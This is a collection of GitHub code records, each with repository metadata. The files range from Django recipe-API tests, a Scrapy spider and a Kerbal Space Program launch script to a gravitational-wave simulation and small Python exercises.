normalise=opt.normalise)\nlpr.load(crnn_path=opt.crnnPath)\n\n\n#### test performance ####\nresult = pd.DataFrame([], columns=['path', 'gTruth', 'pred', 'editDistance'])\n\nfor file in os.listdir(opt.dataPath):\n if file != '.ipynb_checkpoints':\n \n # ground truth\n filename, file_extension = os.path.splitext(file)\n gt = filename.split('_')[-1]\n \n # prediction\n pred = lpr.predict(os.path.join(opt.dataPath, file))\n \n # distance\n dist = editdistance.eval(gt, pred)\n \n result = result.append({'path': file,\n 'gTruth': gt,\n 'pred': pred,\n 'editDistance': dist}, ignore_index=True)\n\n \n#### print and save results ####\nprint(\"Accuracy:\", accuracy_score(result.gTruth, result.pred))\nprint('\\n')\nprint(\"Edit Distance Distribution\")\nprint(result.editDistance.value_counts(sort=False))\n\nresult = result.sort_values(\"editDistance\", ascending=False).reset_index(drop=True)\nresult.to_csv(os.path.join(opt.savePath, 'result.csv'),\n index=False)","repo_name":"kfengtee/crnn-license-plate-OCR","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"36153428425","text":"import tempfile\nimport os\n\nfrom PIL import Image\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Recipe, Tag, Ingredient\n\nfrom recipe.serializers import RecipeSerializer, RecipeDetailSerializer\n\n\nRECIPE_URL = reverse('recipe:recipe-list')\n\n\ndef image_upload_url(recipe_id):\n \"\"\"Return URL for recipe image upload\"\"\"\n return reverse('recipe:recipe-upload-image', args=[recipe_id])\n\n\ndef detail_url(recipe_id):\n \"\"\"Return recipe detail URL\"\"\"\n return reverse('recipe:recipe-detail', args=[recipe_id])\n\n\ndef sample_ingredient(user, name='Cinamon'):\n \"\"\"Create and return a sample ingredient\"\"\"\n return Ingredient.objects.create(user=user, name=name)\n\n\ndef sample_tag(user, name='Main course'):\n \"\"\"Create and return a sample tag\"\"\"\n return Tag.objects.create(user=user, name=name)\n\n\ndef sample_recipe(user, **params):\n \"\"\"Create and return a sample recipe\"\"\"\n defaults = {\n 'title': 'Latte',\n 'time_minutes': 10,\n 'price': 5.5\n }\n defaults.update(params)\n\n return Recipe.objects.create(user=user, **defaults)\n\n\nclass PublicRecipeApiTests(TestCase):\n \"\"\"Test the public Recipe APIs\"\"\"\n\n def setUp(self):\n \"\"\"Prepare for the tests\"\"\"\n self.client = APIClient()\n\n def test_login_required(self):\n \"\"\"Test that login is required for Recipe APIs\"\"\"\n res = self.client.get(RECIPE_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateRecipeApiTests(TestCase):\n \"\"\"Test the authorized Recipe APIs\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n self.user = get_user_model().objects.create_user(\n email='test@bocon.cloud',\n password='testPass',\n name='Test'\n )\n self.client.force_authenticate(user=self.user)\n\n def test_list_recipes_success(self):\n \"\"\"Test that retrieving list of recipes success\"\"\"\n sample_recipe(user=self.user)\n sample_recipe(user=self.user)\n\n res = self.client.get(RECIPE_URL)\n\n recipes = Recipe.objects.all().order_by('-id')\n serializer = RecipeSerializer(recipes, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_limited_recipe_for_authen_user_only(self):\n \"\"\"Test that only retrieve recipes of authenticated user\"\"\"\n user2 = get_user_model().objects.create_user(\n email='test2@bocon.cloud',\n password='testPass2',\n name='Test2'\n )\n\n sample_recipe(user=self.user)\n sample_recipe(user=user2)\n\n res = self.client.get(RECIPE_URL)\n\n recipes = Recipe.objects.filter(user=self.user).order_by('-id')\n serializer = RecipeSerializer(recipes, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)\n\n def test_view_recipe_detail(self):\n \"\"\"Test viewing a recipe detail\"\"\"\n recipe = sample_recipe(user=self.user)\n recipe.tags.add(sample_tag(user=self.user))\n recipe.ingredients.add(sample_ingredient(user=self.user))\n\n url = detail_url(recipe_id=recipe.id)\n res = self.client.get(url)\n\n serializer = RecipeDetailSerializer(recipe)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_create_basic_recipe(self):\n \"\"\"Test that create basic recipe\"\"\"\n payload = {\n 'title': 'Cappucino',\n 'time_minutes': 30,\n 'price': 25.5\n }\n\n res = self.client.post(RECIPE_URL, payload)\n\n recipe = Recipe.objects.get(id=res.data['id'])\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n for key in payload.keys():\n self.assertEqual(payload[key], getattr(recipe, key))\n\n def test_create_recipe_with_tags(self):\n \"\"\"Test creating a recipe with tags\"\"\"\n tag1 = sample_tag(user=self.user, name='Breakfast')\n tag2 = sample_tag(user=self.user, name='Caffein')\n payload = {\n 'title': 'Cappucino',\n 'time_minutes': 10,\n 'price': 20.5,\n 'tags': [tag1.id, tag2.id]\n }\n\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tags.all()\n\n self.assertEqual(tags.count(), 2)\n self.assertIn(tag1, tags)\n self.assertIn(tag2, tags)\n\n def test_create_recipe_with_ingredients(self):\n \"\"\"Test creating recipe with ingredients\"\"\"\n ingred1 = sample_ingredient(user=self.user, name='Milk')\n ingred2 = sample_ingredient(user=self.user, name='Coffee')\n payload = {\n 'title': 'Cappucino',\n 'ingredients': [ingred1.id, ingred2.id],\n 'time_minutes': 10,\n 'price': 15\n }\n\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n recipe = Recipe.objects.get(id=res.data['id'])\n ingreds = recipe.ingredients.all()\n\n self.assertIn(ingred1, ingreds)\n self.assertIn(ingred2, ingreds)\n\n\nclass RecipeImageUploadTests(TestCase):\n\n def setUp(self):\n self.client = APIClient()\n self.user = get_user_model().objects.create_user(\n email='test@bocon.cloud',\n password='testPass',\n name='Test'\n )\n self.client.force_authenticate(self.user)\n self.recipe = sample_recipe(user=self.user)\n\n def tearDown(self):\n self.recipe.image.delete()\n\n def test_upload_image_to_recipe(self):\n \"\"\"Test uploading an image to recipe\"\"\"\n url = image_upload_url(self.recipe.id)\n with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:\n img = Image.new('RGB', (10, 10))\n img.save(ntf, format='JPEG')\n ntf.seek(0)\n\n res = self.client.post(url, {'image': ntf}, format='multipart')\n\n self.recipe.refresh_from_db()\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertIn('image', res.data)\n self.assertTrue(os.path.exists(self.recipe.image.path))\n\n def test_upload_image_bad_request(self):\n \"\"\"Test upload invalid image\"\"\"\n url = image_upload_url(self.recipe.id)\n res = self.client.post(url, {\n 'image': 'notimage'\n }, format='multipart')\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_filter_recipe_by_tags(self):\n \"\"\"Test returning recipes with specific tags\"\"\"\n recipe1 = sample_recipe(user=self.user,\n title='Thai_vegetable_curr')\n recipe2 = sample_recipe(user=self.user,\n title='Aubegine_with_tahin')\n tag1 = sample_tag(user=self.user, name='Vegan')\n tag2 = sample_tag(user=self.user, name='Vegeterian')\n recipe1.tags.add(tag1)\n recipe2.tags.add(tag2)\n\n recipe3 = sample_recipe(user=self.user, title='Fish and chips')\n\n res = self.client.get(\n RECIPE_URL,\n {\n 'tags': f'{tag1.id},{tag2.id}'\n }\n )\n\n serializer1 = RecipeSerializer(recipe1)\n serializer2 = RecipeSerializer(recipe2)\n serializer3 = RecipeSerializer(recipe3)\n\n self.assertIn(serializer1.data, res.data)\n self.assertIn(serializer2.data, res.data)\n self.assertNotIn(serializer3.data, res.data)\n\n def test_filter_recipes_by_ingredients(self):\n \"\"\"Test returning recipes with specific ingredients\"\"\"\n recipe1 = sample_recipe(user=self.user, title='Beans on toast')\n recipe2 = sample_recipe(user=self.user, title='Chicken roasted')\n\n ingredient1 = sample_ingredient(user=self.user, name='Peta cheese')\n ingredient2 = sample_ingredient(user=self.user, name='Chicken')\n\n recipe1.ingredients.add(ingredient1)\n recipe2.ingredients.add(ingredient2)\n\n recipe3 = sample_recipe(user=self.user, title='Steak and mushroom')\n\n res = self.client.get(\n RECIPE_URL,\n {'ingredients': f'{ingredient1.id},{ingredient2.id}'}\n )\n\n serializer1 = RecipeSerializer(recipe1)\n serializer2 = RecipeSerializer(recipe2)\n serializer3 = RecipeSerializer(recipe3)\n\n self.assertIn(serializer1.data, res.data)\n self.assertIn(serializer2.data, res.data)\n self.assertNotIn(serializer3.data, res.data)\n","repo_name":"boconlonton/recipe-app-api-deepdive","sub_path":"app/recipe/tests/test_recipes_api.py","file_name":"test_recipes_api.py","file_ext":"py","file_size_in_byte":8837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20423922515","text":"'''\nFrom shapely respo.\n'''\n\nfrom matplotlib import pyplot\nfrom shapely.geometry import Point\nfrom descartes import PolygonPatch\nfrom matplotlib.font_manager import FontProperties\n\nfont_song = FontProperties(fname=\"/usr/share/fonts/xpfonts/simfang.ttf\")\nfrom figures import SIZE, BLUE, GRAY, set_limits, WHITE, BLACK\n\nfig = pyplot.figure(1, figsize=SIZE, dpi=90)\n\na = Point(1, 1).buffer(1.5)\nb = Point(2, 1).buffer(1.5)\n\n# 1\nax = fig.add_subplot(121)\n\npatch1 = PolygonPatch(a, fc=WHITE, ec=BLACK, alpha=0.2, zorder=1)\nax.add_patch(patch1)\npatch2 = PolygonPatch(b, fc=WHITE, ec=BLACK, alpha=0.2, zorder=1)\nax.add_patch(patch2)\nc = a.intersection(b)\npatchc = PolygonPatch(c, fc=GRAY, ec=GRAY, alpha=0.5, zorder=2)\nax.add_patch(patchc)\n\nax.set_title('a.intersection(b)')\n\nset_limits(ax, -1, 4, -1, 3)\n\n# 2\nax = fig.add_subplot(122)\n\npatch1 = PolygonPatch(a, fc=WHITE, ec=BLACK, alpha=0.2, zorder=1)\nax.add_patch(patch1)\npatch2 = PolygonPatch(b, fc=WHITE, ec=BLACK, alpha=0.2, zorder=1)\nax.add_patch(patch2)\nc = a.symmetric_difference(b)\n\nif c.geom_type == 'Polygon':\n patchc = PolygonPatch(c, fc=GRAY, ec=GRAY, alpha=0.5, zorder=2)\n ax.add_patch(patchc)\nelif c.geom_type == 'MultiPolygon':\n for p in c:\n patchp = PolygonPatch(p, fc=GRAY, ec=GRAY, alpha=0.5, zorder=2)\n ax.add_patch(patchp)\n\nax.set_title('a.symmetric_difference(b)')\n\nset_limits(ax, -1, 4, -1, 3)\n\n# pyplot.show()\n\nimport os\n\nplt = pyplot\n\nplt.savefig(os.path.join(os.path.split(os.path.realpath(__file__))[0],\n 'xx{bname}.pdf'.format(\n bname=os.path.splitext(os.path.basename(__file__))[0][4:]\n )\n ), bbox_inches='tight')\n\nplt.savefig(os.path.join(os.path.split(os.path.realpath(__file__))[0],\n 'xx{bname}.png'.format(\n bname=os.path.splitext(os.path.basename(__file__))[0][4:]\n )\n ), bbox_inches='tight')\n\npyplot.clf()\n","repo_name":"bukun/book_python_gis","sub_path":"part010/ch05_shapely/sec4_spatial_analysis/test_fig_intersection-sym-difference.py","file_name":"test_fig_intersection-sym-difference.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"31"} +{"seq_id":"14574842918","text":"from datetime import datetime\n\ndef Calculate_Age(birthdate):\n current_date = datetime.now()\n\n years_diff = current_date.year - birthdate.year\n months_diff = current_date.month - birthdate.month\n days_diff = current_date.day - birthdate.day\n\n if (current_date.year, current_date.month) < (birthdate.year, birthdate.month):\n years_diff -= 1\n\n if (current_date.month, current_date.day) < (birthdate.month, birthdate.day):\n months_diff -= 1\n\n return years_diff, months_diff, days_diff\n\nbirth_year = int(input('Enter the birth year: '))\nbirth_month = int(input('Enter the birth month: '))\nbirth_day = int(input('Enter the birth day: '))\n\nbirthdate = datetime(birth_year, birth_month, birth_day)\n\nyears, months, days = Calculate_Age(birthdate)\n\nprint(f'The age is {years} years, {months} months and {days} days ')","repo_name":"vijaypathem/MyProjects-python","sub_path":"Find_age1.py","file_name":"Find_age1.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33990380594","text":"import scrapy\r\nimport saves\r\n\r\nclass PublisherSpider(scrapy.Spider):\r\n\tname = \"publishers\"\r\n\tstart_urls = [\"https://www.fakku.net/hentai/publishers\"]\r\n\r\n\tdef parse(self, response):\r\n\r\n\t\t#save file\r\n\t\tfilename = \"f-publisher.html\"\r\n\t\tsaves.save_file(response.body, filename)\r\n\r\n\t\thref = response.css(\"a.attribute-row::attr(href)\").extract()\r\n\t\tfor link in href:\r\n\t\t\tyield scrapy.Request(response.urljoin(link), callback = self.parse_pub)\r\n\r\n\tdef parse_pub(self, response):\r\n\t\tdef extract_with_css(query):\r\n\t\t\treturn response.css(query).extract_first().strip()\r\n\r\n\t\tname = extract_with_css(\"h1.attribute-title::text\").replace(\"Hentai\", \"\").strip()\r\n\t\t#Saving the file\r\n\t\tfilename = \"publisher-{}.html\".format(name.lower().replace(\" \", \"-\"))\r\n\t\tsaves.save_file(response.body, filename)\r\n\r\n\t\tyield {\r\n\t\t\t\"name\": name,\r\n\t\t\t\"followers\": extract_with_css(\"div.attribute-subscribers span::text\")\r\n\t\t}","repo_name":"HBeats/spiders","sub_path":"publishers_spider.py","file_name":"publishers_spider.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70170978327","text":"# Modified by David Garrett\n# 3-23-2021\n# Test - Chapter 2\n\nprint('MPG calculator')\nmiles_driven = float(input('How many miles did you drive? '))\n# Eliminated \"miles_driven = int(user_input)\" line. user_input variable has no assigned value.\n# \"input('How many miles did you drive? ')\" line is now assigned to miles_driven. Allows the calculation later to work.\n# Encompassed input function with the float() function. Converts text value to a numerical value. Also, simplifies the code\n# Changed int() to float() function to allow for decimal values\ngallons_purchased = float(input('How much gas did you use? ')) # Changed int() to float()\nmpg = miles_driven / gallons_purchased # Changed integer division operator to division operator to allow for values with decimals\n# Eliminated \"mpg = format(mpg, '2f')\" line. Format function added to next line. Simplifies code.\nprint('You got', format(mpg, '.2f'), 'miles per gallon.')\n# Changed the format of mpg from '2f' to '.2f' to format value to two decimal places. '2f' doesn't format the number.\n","repo_name":"DavidWGarrett/EET107_Python","sub_path":"CH2.py","file_name":"CH2.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"830686035","text":"#Bellmann-Ford Algorithm\nimport sys\nread = sys.stdin.readline\nINF = sys.maxsize\n\nN, M = map(int, read().split())\ndist = [INF for _ in range(N+1)]\nedges, dist[1] = [], 0\nfor _ in range(M):\n edges.append(list(map(int, read().split())))\n\nfor i in range(N): # If there is no negative cycle, only N-1 iterations are required.\n for u, v, w in edges: # Check all edges every time.\n if dist[u] != INF and dist[v] > dist[u] + w:\n if i == N-1: # 'dist' changed at Nth iteration, therefore negative cycle exists.\n print(-1)\n sys.exit(0)\n dist[v] = dist[u] + w\n\nfor i in range(2, N+1):\n print(-1 if dist[i]==INF else dist[i])\n","repo_name":"KeenyJin/BAEKJOON","sub_path":"Graph/11657.py","file_name":"11657.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"11258584190","text":"from User.signals import myuser_logged_in\n\n\ndef after_login_callback(sender, user, request, **kwargs):\n import datetime\n if user:\n user.latest_login = datetime.datetime.now()\n user.save()\n\nmyuser_logged_in.connect(after_login_callback, dispatch_uid=\"update_lastest_login\")","repo_name":"mutoulbj/BOHOO","sub_path":"User/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"33647169049","text":"def getForgotten(speech, text):\n speechList = speech.split(\" \")\n textList = text.split(\" \")\n \n forgotList = []\n \n for elem in textList:\n \n if(elem not in speechList):\n print(\"uh oh\")\n forgotList.append(elem.upper())\n else:\n forgotList.append(elem)\n \n \n return \" \".join(forgotList);\n \ndef getExtra(speech, text):\n speechList = speech.split(\" \")\n textList = text.split(\" \")\n \n extraList = []\n \n for elem in speechList:\n \n if(elem not in textList):\n print(\"uh oh\")\n extraList.append(elem.upper())\n else:\n extraList.append(elem)\n \n \n return \" \".join(extraList);\n \ndef countUmLike(text):\n textList = text.split(\" \");\n count = 0\n \n for elem in textList:\n if(elem == \"um\" or elem == \"like\"):\n count += 1\n \n return count\n \n","repo_name":"anish-krishnan/Syft","sub_path":"SpeechAnalysis/forgottenText.py","file_name":"forgottenText.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"1474836130","text":"import gradio as gr\nfrom PIL import Image\nfrom urllib.request import Request, urlopen\n\ndef display_image_from_url(url, input_image):\n if url == '' and input_image is None:\n return None, \"\", \"\"\n\n image = None\n if url != '':\n req = Request(\n url=url, \n headers={'User-Agent': 'Mozilla/5.0'}\n )\n res = urlopen(req)\n image = Image.open(res)\n image.load()\n\n\n if input_image is not None:\n image = input_image\n\n parameters = \"Parameters have been erased from this image or unsupported format\"\n if 'parameters' in image.info:\n parameters = image.info['parameters']\n\n return image, parameters, image.info\n\nblocks = gr.Blocks(css=\"#out_image {height: 400px}\")\nwith blocks as png_info:\n with gr.Row():\n gr.Markdown(\n \"\"\"\n Report any issues on the [GitHub](https://github.com/andzhik/png-params) page of this project\n \"\"\")\n with gr.Row().style(equal_height=False):\n with gr.Column():\n in_url = gr.Textbox(label=\"Source URL\")\n in_image = gr.Image(label=\"Source Image\", type='pil')\n with gr.Row():\n btn_submit = gr.Button(\"Submit\", variant=\"primary\")\n\n with gr.Column():\n out_image = gr.Image(type='pil', elem_id=\"out_image\")\n out_info = gr.Textbox(label=\"Generation Parameters\")\n out_meta = gr.Textbox(label=\"Metadata\")\n \n btn_submit.click(fn=display_image_from_url,\n inputs=[in_url, in_image],\n outputs=[out_image, out_info, out_meta])\n \npng_info.launch()\n","repo_name":"andzhik/png-params","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"15662442281","text":"#This program launches a rocket into orbit in Kerbal Space Program.\r\n#Created by Eric Fernald.\r\n\r\n\"\"\"\r\nTo run this KSP kRPC Python program you need:\r\n- Kerbal Space Program (tested in 1.5.1)\r\n- OrbitRocket Craft file included in the directory.\r\n- kRPC 0.4.8 (https://github.com/krpc/krpc/releases/download/v0.4.8/krpc-0.4.8.zip)\r\n Use the install guide on https://krpc.github.io/krpc/getting-started.html\r\n- I've also installed the Python client library (https://pypi.python.org/pypi/krpc)\r\n- Python 3.9.1 (https://www.python.org/downloads/release/python-391/)\r\n\"\"\"\r\n\r\nimport krpc\r\nimport time \r\nimport unittest\r\nimport RocketLaunch\r\n\r\n#Establishes connection to the krpc server.\r\nconn = krpc.connect()\r\n\r\n#Establishes the rocket as the main vessel.\r\nvessel = conn.space_center.active_vessel\r\n\r\n#Countdown Sequence.\r\ncountdown = [\"Five\", \"Four\", \"Three\", \"Two\", \"One\", \"LIFT OFF!\"]\r\n\r\n#Start the Countdown Sequence.\r\nfor i in range(len(countdown)):\r\n print(countdown[i])\r\n time.sleep(1)\r\n\r\nvessel.control.throttle = 1\r\nvessel.control.activate_next_stage()\r\n\r\n#Flight State.\r\nascentPhase = True\r\ncruisePhase = False\r\ninsertionPhase = False\r\n\r\n#Main Launch Control.\r\nwhile ascentPhase or cruisePhase or insertionPhase:\r\n altitude = vessel.flight().mean_altitude\r\n heading = vessel.flight().heading\r\n\r\n #Ascent Phase.\r\n if ascentPhase:\r\n targetPitch = 90 * ((50000 - altitude) / 50000)\r\n pitchDiff = vessel.flight().pitch - targetPitch\r\n\r\n #Heading Control.\r\n if heading < 180:\r\n vessel.control.yaw = (pitchDiff / 90)\r\n else:\r\n vessel.control.yaw = 0.5\r\n\r\n #Adds another stage activation to the vessel if more than one stage is required to get to orbit.\r\n if vessel.thrust == 0.0:\r\n vessel.control.activate_next_stage()\r\n \r\n #MECO (Main Engine Cut Off)\r\n if vessel.orbit.apoapsis > 690000:\r\n vessel.control.throttle = 0\r\n time.sleep(0.5)\r\n vessel.control.activate_next_stage()\r\n\r\n vessel.control.sas = True\r\n time.sleep(0.1)\r\n vessel.control.sas_mode = conn.space_center.SASMode.prograde\r\n\r\n ascentPhase = False\r\n cruisePhase = True\r\n \r\n #Cruise Phase.\r\n elif cruisePhase:\r\n if altitude > 80000:\r\n cruisePhase = False\r\n insertionPhase = True\r\n vessel.control.sas = False\r\n vessel.control.throttle = 1\r\n\r\n #Insertion Phase.\r\n elif insertionPhase:\r\n targetPitch = 0\r\n pitchDiff = vessel.flight().pitch - targetPitch\r\n\r\n #Heading Control.\r\n if heading < 180:\r\n vessel.control.yaw = (pitchDiff / 90)\r\n if vessel.flight().pitch < 1 and vessel.flight().pitch > -1:\r\n vessel.control.sas = True\r\n else:\r\n vessel.control.sas = False\r\n else:\r\n vessel.control.yaw = 0.5\r\n\r\n #SECO (Second Engine Cut Off).\r\n if vessel.orbit.periapsis > 690000:\r\n vessel.control.throttle = 0\r\n insertionPhase = False\r\n \r\n #Staging.\r\n if vessel.thrust == 0.0:\r\n vessel.control.activate_next_stage()\r\n\r\nclass TestRocketLaunch(unittest.TestCase):\r\n def setUp(self):\r\n self.conn = krpc.connect()\r\n self.vessel = self.conn.space_center.active_vessel\r\n\r\n def test_countdown(self):\r\n countdown = [\"Five\", \"Four\", \"Three\", \"Two\", \"One\", \"LIFT OFF!\"]\r\n RocketLaunch.start_countdown(self.vessel)\r\n self.assertEqual(RocketLaunch.countdown, countdown)\r\n\r\n def test_ascent_phase(self):\r\n RocketLaunch.ascent_phase(self.vessel)\r\n self.assertTrue(RocketLaunch.ascentPhase)\r\n\r\n def test_cruise_phase(self):\r\n RocketLaunch.cruise_phase(self.vessel)\r\n self.assertTrue(RocketLaunch.cruisePhase)\r\n\r\n def test_insertion_phase(self):\r\n RocketLaunch.insertion_phase(self.vessel)\r\n self.assertTrue(RocketLaunch.insertionPhase)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"Eric-Fernald/Personal-Coding-Projects","sub_path":"Projects/Kerbal Space Program Rocket To Orbit/RocketLaunch.py","file_name":"RocketLaunch.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12849404285","text":"#This code is a crawler to get park on www.meituan.com\n\n# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport io\nimport os\nimport re\nimport random\nimport codecs\n\ndef get_park():\n url = \"https://i.meituan.com/notel/proxy?requestUrl=http%3A%2F%2Fapimobile.vip.sankuai.com%2Fgroup%2Fv2%2Farea%2Flist%3Fuuid%3D618C49BDF412F34E95C59B7AD8E819474772EAE2E66CBA65F99446E128F32FB5%26cityId%3D10\"\n headers = {\n \"Accept\": \"application/json\",\n \"X-Requested-With\" : \"XMLHttpRequest\",\n \"Referer\": \"https://i.meituan.com/trip/lvyou/triplist/poi/?stid_b=1&cevent=imt%2Fhomepage%2Fcategory1%2F195\",\n \"User-Agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n }\n query_string = {\n \"requestUrl\" : \"http://apimobile.vip.sankuai.com/group/v2/area/list?uuid=618C49BDF412F34E95C59B7AD8E819474772EAE2E66CBA65F99446E128F32FB5&cityId=10\"\n }\n response = requests.get(url,data=query_string,headers=headers)\n json_str = response.content.decode()\n ret1 = json.loads(json_str)['data']['landmarks']\n park_all = []\n for element in ret1:\n if element['type']==3:\n element_s = \"上海市\" + element['name']\n park = json.dumps(element_s,ensure_ascii=False,indent=2)\n park_all.append(park)\n all = len(park_all)\n number = random.sample(range(0,all-1),10)\n park = []\n with open(\"park_select.txt\",\"w\",encoding=\"utf-8\") as f:\n for i in number:\n park.append(park_all[i])\n f.write(park_all[i])\n f.write(\"\\n\")\n print(\"\\n\")\n print(\"开始寻找公园\")\n print(park)\n price_park = []\n for i in range(10):\n price_park.append('0')\n return park, price_park\n","repo_name":"zhaoyiran924/Dating-Route-Recommendation","sub_path":"get_park.py","file_name":"get_park.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70856798488","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\n\nfrom numpy.random import default_rng\n\nimport time\nimport json\n\nfrom tqdm import tqdm\nfrom astropy.cosmology import FlatLambdaCDM\n\nimport argparse\n\nimport GWFish.modules as gw\n\ncosmo = FlatLambdaCDM(H0=69.6, Om0=0.286)\n\nrng = default_rng()\n\ndef main():\n # example to run with command-line arguments:\n # python CBC_Simulation.py --pop_file=CBC_pop.hdf5 --detectors ET CE2 --networks [[0,1],[0],[1]]\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--pop_file', type=str, default='./injections/CBC_pop.hdf5', nargs=1,\n help='Population to run the analysis on.'\n 'Runs on BBH_1e5.hdf5 if no argument given.')\n parser.add_argument(\n '--pop_id', type=str, default='BBH', nargs=1,\n help='Short population identifier for file names. Uses BBH if no argument given.')\n parser.add_argument(\n '--detectors', type=str, default=['ET'], nargs='+',\n help='Detectors to analyze. Uses ET as default if no argument given.')\n parser.add_argument(\n '--networks', default='[[0]]', nargs=1,\n help='Network IDs. Uses [[0]] as default if no argument given.')\n parser.add_argument(\n '--config', type=str, default='GWFish/detectors.yaml',\n help='Configuration file where the detector specifications are stored. Uses GWFish/detectors.yaml as default if no argument given.')\n \n\n args = parser.parse_args()\n ConfigDet = args.config\n\n threshold_SNR = np.array([0., 9.]) # [min. individual SNR to be included in PE, min. network SNR for detection]\n calculate_errors = False # whether to calculate Fisher-matrix based PE errors\n duty_cycle = False # whether to consider the duty cycle of detectors\n\n fisher_parameters = ['ra', 'dec', 'psi', 'theta_jn', 'luminosity_distance', 'mass_1', 'mass_2', 'geocent_time', 'phase']\n #fisher_parameters = ['luminosity_distance','ra','dec']\n\n pop_file = args.pop_file\n population = args.pop_id\n\n detectors_ids = args.detectors\n networks_ids = json.loads(args.networks)\n\n parameters = pd.read_hdf(pop_file)\n\n network = gw.detection.Network(detectors_ids, detection_SNR=threshold_SNR, parameters=parameters,\n fisher_parameters=fisher_parameters, config=ConfigDet)\n\n # lisaGWresponse(network.detectors[0], frequencyvector)\n # exit()\n\n # horizon(network, parameters.iloc[0], frequencyvector, threshold_SNR, 1./df, fmax)\n # exit()\n\n #waveform_model = 'gwfish_TaylorF2'\n waveform_model = 'gwfish_IMRPhenomD'\n #waveform_model = 'lalsim_TaylorF2'\n #waveform_model = 'lalsim_IMRPhenomD'\n # waveform_model = 'lalsim_IMRPhenomXPHM'\n\n\n print('Processing CBC population')\n for k in tqdm(np.arange(len(parameters))):\n parameter_values = parameters.iloc[k]\n\n networkSNR_sq = 0\n for d in np.arange(len(network.detectors)):\n wave, t_of_f = gw.waveforms.hphc_amplitudes(waveform_model, parameter_values,\n network.detectors[d].frequencyvector)\n #plot=network.detectors[d].plotrange)\n signal = gw.detection.projection(parameter_values, network.detectors[d], wave, t_of_f)\n\n SNRs = gw.detection.SNR(network.detectors[d], signal, duty_cycle=duty_cycle)\n networkSNR_sq += np.sum(SNRs ** 2)\n network.detectors[d].SNR[k] = np.sqrt(np.sum(SNRs ** 2))\n\n if calculate_errors:\n network.detectors[d].fisher_matrix[k, :, :] = \\\n gw.fishermatrix.FisherMatrix(waveform_model, parameter_values, fisher_parameters, network.detectors[d])\n\n network.SNR[k] = np.sqrt(networkSNR_sq)\n\n gw.detection.analyzeDetections(network, parameters, population, networks_ids)\n\n if calculate_errors:\n gw.fishermatrix.analyzeFisherErrors(network, parameters, fisher_parameters, population, networks_ids)\n\nif __name__ == '__main__':\n start_time = time.time()\n main()\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"bvgoncharov/GWFish-old","sub_path":"CBC_Simulation.py","file_name":"CBC_Simulation.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41693868096","text":"# -*- coding: utf-8 -*-\n\"\"\"\n CreatedDate: 2022-06-17\n FileName : dailyTemperatures.py\n Author : Honghe\n Descreption: 剑指 Offer II 038. 每日温度\n\"\"\"\n\n\nclass Solution(object):\n def dailyTemperatures(self, temperatures):\n \"\"\"\n 暴力法\n :type temperatures: List[int]\n :rtype: List[int]\n \"\"\"\n res = []\n\n for index,i in enumerate(temperatures[:-1]):\n dif = 0\n for index2,j in enumerate(temperatures[index+1:]):\n if j>i:\n dif = index2+1\n break\n res.append(dif)\n res.append(0)\n return res\n\n def dailyTemperatures2(self, tokens):\n \"\"\"\n 单调栈\n :type tokens: 